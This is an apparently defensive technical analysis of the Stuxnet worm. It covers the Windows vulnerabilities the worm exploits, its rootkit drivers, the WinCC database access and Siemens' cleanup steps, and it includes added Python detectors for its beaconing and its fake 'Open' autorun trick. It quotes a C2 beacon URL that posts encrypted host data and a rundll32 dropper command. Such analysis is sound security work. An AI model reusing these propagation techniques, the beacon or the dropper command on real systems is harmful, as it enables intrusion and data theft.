
Stuxnet attackers and Windows zero-day exploits

STUXNET is a worm that initially made news in July due to its use of certain vulnerabilities to propagate
and execute its routines. The media, as well as the security industry, have taken an interest in this threat
since its emergence, primarily because new findings suggest that STUXNET is not just another
run-of-the-mill malware, but one designed to target critical infrastructure. STUXNET has
three components that work in concert: a worm, an LNK file and a rootkit.

Stuxnet features:

• Self-replicates through removable drives by exploiting a vulnerability that allows automatic execution: the
Microsoft Windows Shortcut ‘LNK/PIF’ Files Automatic File Execution Vulnerability.

• Spreads in a LAN through a vulnerability in the Microsoft Windows Print Spooler Service.

• Spreads through SMB by exploiting the Microsoft Windows Server Service RPC Handling Remote Code
Execution Vulnerability.

• Copies and executes itself on remote computers through network shares.

• Copies and executes itself on remote computers running a WinCC database server.

• Copies itself into Step 7 projects in such a way that it automatically executes when the Step 7 project is
loaded.

• Updates itself through a peer-to-peer mechanism within a LAN.

WORM_STUXNET – the worm executes all routines related to the main payload of the attack. It uses
certain vulnerabilities for its propagation and execution of certain routines. It implements a Microsoft
Remote Procedure Call to execute certain functions, enabling affected systems to communicate with one
another. It also tests for an active Internet connection on the affected system to communicate with a
remote server. It is also the component responsible for attempting to access a database consistent with
one used in Siemens WinCC systems.

LNK_STUXNET – this specially crafted .LNK file automatically executes the propagated copies of
WORM_STUXNET. It exploits a vulnerability in the way Windows displays icons in shortcut files, and is
employed by STUXNET essentially for automatic execution.

RTKT_STUXNET – this rootkit component is mainly responsible for hiding all files and processes. This is
done in order to keep the infection from being traced by the user.

One reason STUXNET has become such a problem is that it uses multiple means to propagate:

• First, it uses the MS10-046 Windows shortcut vulnerability (CVE-2010-2568), which
allowed it to spread via removable drives even if Autorun was disabled.

• Second, it uses the MS08-067 vulnerability (CVE-2008-4250) to spread via the network the
same way DOWNAD/Conficker did.

• Third, it uses the MS10-061 Print Spooler vulnerability (CVE-2010-2729) to spread via
networks if a system was sharing a printer over the network.

By AJAY P K TATAPUDI
Scientific Officer/Engg-SB,NIC State Unit,Nagaland

Of these three vulnerabilities, the shortcut and spooler vulnerabilities were both unpatched at the
time of exploitation. All of these vulnerabilities have since been patched, meaning that patched systems cannot
be easily infected. MS10-061 could only be used if anonymous users could use shared printers. By
default, this was the case in Windows XP, but not in later versions of Windows. The shortcut vulnerability
was the most exploitable, as accessing the removable drive in any way was sufficient
to trigger it.

In addition, STUXNET uses two currently unpatched vulnerabilities in Windows to gain administrator rights on a
system. The Windows shortcut vulnerability only runs code with the same privileges as the current user; using
these two vulnerabilities ensures that this malware has the same rights as an administrator of the system.

STUXNET installs both server and client components for a Microsoft Remote Procedure Call on all infected
systems by exploiting the MS08-067 vulnerability. This enables the affected system to execute the
following functions on any client that it can connect to:

• Get malware version

• Receive module and inject it

• Send the malware file

• Create a process, which could be a command shell or a file

• Create a file

• Delete a file

• Read a file

All affected systems are set to use the UUID (Universally Unique Identifier)
000204e1-0000-0000-c000-000000000046. Using this identifier enables systems affected by STUXNET to identify,
communicate with and update one another.

In attempting to connect with a remote server, STUXNET first tests for an active Internet connection by
connecting to the following non-malicious URLs:

• www.windowsupdate.com

• www.msn.com

After a connection is established, it then connects to the following URL(s) to send and receive commands
from a remote malicious user.

It then generates the following URL and posts it to the server:

• http://www.{BLOCKED}erfutbol.com/index.php?data={data}

where {data} is an encrypted hex value containing the IP address, computer name and domain of the
machine.
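As an added example (not part of the original article), the following Python sketches a detection for the beaconing sequence just described, run over constructed proxy-log lines: a host that first touches the two connectivity-check sites and then posts a long hex `data` value to an `index.php`. The log format and the placeholder C2 host `www.BLOCKED-c2.example` are assumptions, since the page blocks the real domain.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed proxy-log lines ("timestamp client method url"; the format is an assumption,
# not any real product's). The C2 host is a placeholder standing in for the blocked domain.
SAMPLE_LOG = """\
2010-07-20T10:01:02 10.0.0.5 GET http://www.windowsupdate.com/
2010-07-20T10:01:03 10.0.0.5 GET http://www.msn.com/
2010-07-20T10:01:05 10.0.0.5 GET http://www.BLOCKED-c2.example/index.php?data=0a1b2c3d4e5f60718293a4b5c6d7e8f90011223344
2010-07-20T10:05:00 10.0.0.9 GET http://www.msn.com/
2010-07-20T10:06:00 10.0.0.9 GET http://intranet.example/index.php?data=hello
2010-07-20T10:07:00 10.0.0.12 GET http://www.BLOCKED-c2.example/index.php?data=00112233445566778899aabbccddeeff
"""

# The two benign hosts the page says Stuxnet contacts to test for Internet access.
CONNECTIVITY_HOSTS = {"www.windowsupdate.com", "www.msn.com"}
# The page says {data} is an encrypted hex value, so require a reasonably long hex string.
HEX_RE = re.compile(r"^[0-9a-fA-F]{16,}$")

def looks_like_beacon(url):
    """True if the URL has the beacon shape: a path ending in /index.php with a single
    'data' parameter whose value is a long hex blob."""
    u = urlparse(url)
    if not u.path.endswith("/index.php"):
        return False
    q = parse_qs(u.query)
    return set(q) == {"data"} and len(q["data"]) == 1 and bool(HEX_RE.match(q["data"][0]))

def find_suspect_clients(log_text):
    """Return (clients that ran the connectivity check and then beaconed,
    clients that beaconed without a preceding check). The second list keeps a
    host from being missed just because its check was not logged."""
    checked, with_check, without_check = set(), set(), set()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, client, _, url = line.split(maxsplit=3)
        host = urlparse(url).hostname
        if host in CONNECTIVITY_HOSTS:
            checked.add(client)
        elif looks_like_beacon(url):
            (with_check if client in checked else without_check).add(client)
    return sorted(with_check), sorted(without_check)
```

Hits on www.msn.com alone are common traffic; only the beacon-shaped request that follows it is the signal, which is why the function keys on the URL shape rather than on the connectivity hosts.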

The Trend Micro™ Smart Protection Network™ protects against all components of the STUXNET threat.
The new web-based attacks (BSEO) are blocked using web reputation and all the file components are
detected using file reputation. The cloud-client architecture ensures all customers are protected
immediately, regardless of where users connect, from home, on the road or within their network.
Below are the files detected by Trend Micro:

• LNK_STUXNET.A

• LNK_STUXNET.AK

• LNK_STUXNET.C

• LNK_STUXNET.SM

The STUXNET worm itself is detected as:

• WORM_STUXNET.A

• WORM_STUXNET.AV

• WORM_STUXNET.SM

The rootkit component is similarly detected as RTKT_STUXNET.A.

In addition, Trend Micro offers virtual patching for the vulnerabilities used in this attack with Deep
Security and OfficeScan with the Intrusion Defense Firewall plug-in, which are able to prevent network
propagation of STUXNET files.

STUXNET also scans the system for certain processes related to security software and then attempts to
inject itself into them. Once fully installed on the system, STUXNET exploits the Siemens SIMATIC WinCC
Default Password Security Bypass Vulnerability to gain access to the back-end SQL database of the WinCC SQL server.

The user login and password for WinCC are freely definable and have nothing to do with access
to the internal database. The internal system authentication from WinCC to the Microsoft SQL database is
based on pre-defined access data. This data is not visible to the customer and is used as an internal
system mechanism for communication between the WinCC system components and the database.
Changing the access data would impede communication between WinCC and the database and is
therefore not recommended. Tightening up authentication procedures is being examined.

This enables the attacker to view the projects database and project information from the WinCC
server. It can alter configuration settings and can access or delete the file %ALL USERS PROFILE%\sql%05x.dbi.
Since .DBI files are database explorer information files, this deletion is most likely done to
remove any trace of modifications made by the malware in the database.

The vulnerability could allow remote code execution if the icon of a specially crafted shortcut is
displayed. An attacker who successfully exploited this vulnerability could gain the same user rights as
the local user. Users whose accounts are configured to have fewer user rights on the system could be
less impacted than users who operate with administrative user rights.

The flaw affects all currently supported versions of Windows XP, Vista, Windows 7, Windows Server 2008
and Windows Server 2008 R2.

If the system is infected, the following are written to disk:

1. The main Stuxnet payload .dll file is saved as Oem7a.pnf.

2. A 90-byte data file is copied to %SystemDrive%\inf\mdmeric3.PNF.

3. The configuration data for Stuxnet is copied to %SystemDrive%\inf\mdmcpq3.PNF.

4. A log file is copied to %SystemDrive%\inf\oem6C.PNF.

It can bypass security software using the following certificate signatures.

The worm has some rootkit functionality: during infection of the system it drops and installs two
kernel-mode drivers that allow it to hide files and inject code into processes on the system:
MrxCls.sys and MrxNet.sys.

These modules are not packed or protected with any packer or protector. Moreover, these drivers are
digitally signed. Here are the digital certificates of the public keys corresponding to the private keys used
to sign the drivers.

This driver (MRXCLS.SYS) is designed to inject code into the address space of processes on the
system. It is registered in the OS as a boot-start service named MRXCLS, and is thus loaded as early as
possible in the OS boot process.

USB sticks with STUXNET:


Stuxnet also uses another trick to enhance the chances that it will be executed. The autorun commands
turn off autoplay and then add a new command to the context menu. The command that is added is
found in %Windir%\System32\shell32.dll,-8496. This is actually the “Open” string. Now when viewing the
context menu for the removable device the user will actually see two “Open” commands.

One of these Open commands is the legitimate one and one is the command added by Stuxnet. If a user
chooses to open the drive via this menu, Stuxnet will execute first. Stuxnet then opens the drive to hide
that anything suspicious has occurred.
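As an added example (not code from the original article), the following Python parses an autorun.inf and flags the duplicate "Open" trick described above: a custom shell verb whose menu label is borrowed from the shell32.dll string resource -8496, combined with AutoPlay being switched off and that verb being made the default. The sample file is constructed for the test and its command line is a placeholder; the [autorun] key names used are standard Windows autorun.inf syntax.

```python
import re

# Constructed autorun.inf modelled on the behaviour described above, not a real Stuxnet sample:
# AutoPlay is off, a custom verb takes its menu label from shell32.dll string resource -8496
# (the system "Open" string) and becomes the default action. The command is a placeholder.
SAMPLE_AUTORUN = r"""
[autorun]
UseAutoPlay=0
shell\opn=@%Windir%\System32\shell32.dll,-8496
shell\opn\command=rundll32.exe PLACEHOLDER.TMP,PlaceholderExport
shell=opn
"""

OPEN_RESOURCE = re.compile(r"shell32\.dll,-8496$", re.IGNORECASE)

def parse_autorun(text):
    """Return the [autorun] section as a dict of lower-cased key -> value; other sections are ignored."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if in_section and "=" in line:
            key, val = line.split("=", 1)
            entries[key.strip().lower()] = val.strip()
    return entries

def fake_open_verbs(entries):
    """Verbs labelled with the system 'Open' string that carry their own command. A drive needs
    no custom verb to offer 'Open', so this is what produces the duplicate 'Open' menu entry."""
    hits = []
    for key, val in entries.items():
        m = re.fullmatch(r"shell\\([^\\]+)", key)
        if m and OPEN_RESOURCE.search(val) and f"{key}\\command" in entries:
            hits.append(m.group(1))
    return hits

def assess_autorun(text):
    """Return a list of findings for an autorun.inf; an empty list means nothing matched."""
    entries = parse_autorun(text)
    verbs = fake_open_verbs(entries)
    findings = [f"verb '{v}' is labelled with the system Open string" for v in verbs]
    if verbs and entries.get("shell", "").lower() in verbs:
        findings.append("the fake Open verb is the default action")
    if verbs and entries.get("useautoplay") == "0":
        findings.append("AutoPlay is disabled so the user is pushed to the context menu")
    return findings
```

A genuine vendor autorun.inf that adds an "Install" verb with its own label produces no findings, so the check keys on the borrowed system string rather than on the mere presence of custom verbs.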

Printer Spooler Vulnerability:

Another way in which the worm replicates itself over the network exploits a vulnerability in the Windows
Print Spooler (MS10-061). Machines with file and printer sharing turned on are vulnerable to the attack. This
vulnerability results in privilege escalation, allowing a remote user using a Guest account to write into the
%SYSTEM% directory of the target machine.

The attack is performed in two stages: during the first stage the worm copies the dropper and an additional
file into Windows\System32\winsta.exe and Windows\System32\wbem\mof\sysnullevnt.mof
respectively, while in the second stage the dropper is executed.

The first stage exploits the MS10-061 vulnerability. Under certain conditions the spooler improperly
impersonates a client that sends two “documents” for printing, as shown in the figure below.

These documents are “printed” to files in the %SYSTEM% directory even though the user has only Guest privileges,
which should not entail access rights to the %SYSTEM% directory.

Network Shared Folders And RPC Vulnerability:


The worm is also capable of distributing itself over the network through shared folders. It scans the network
shares c$ and admin$ on remote computers, installs a file (dropper) there with the name
DEFRAG<GetTickCount>.TMP, and schedules a task to be executed the next day:

rundll32.exe "C:\addins\DEFRAGdc2d0.TMP", DllGetClassObject

Determine whether your Microsoft Windows computer is affected by the virus:

Use the Sysclean virus scan tool or the anti-virus programs approved by Siemens from Trend Micro,
McAfee or Symantec with patterns from July 25, 2010 or more recent.

IMPORTANT: Deactivate the "Automatically Clean Infected Files" function.

If a virus has been detected, please proceed as follows:

1. Install the Microsoft patch.

2. Disconnect the computer from the network immediately.

3. Create a power user, but remain logged in with administrator rights to execute the tool SYSCLEAN and
the SIMATIC Security Update.

4. Clean the computer with "Sysclean" with the "Automatically Clean Infected Files" function activated.

5. Install the SIMATIC Security Update.

6. From this moment the computer must no longer be used with administrator rights.

7. Reboot the computer.

8. Log in as the power user.

9. Carry out another virus scan with your installed virus scanner and leave the virus scanner running
permanently.

10. Restore the computer to the network.

The following precautionary measures still apply:

All contacts with the outside world (customer data, USB devices, others) must be tested and cleaned.

Do not use, if possible, any third-party USB sticks and/or mobile data carriers.

Always check your safety concepts, e.g. deactivate/uninstall services that are not required.

It's recommended to install the Microsoft patch for those operating systems stated by
Microsoft.

“Stuxnet was undoubtedly created by professionals who’ve got a thorough grasp of
antivirus technologies and their weaknesses, as well as information about as yet unknown
vulnerabilities and the architecture and hardware of WinCC and PSC7”
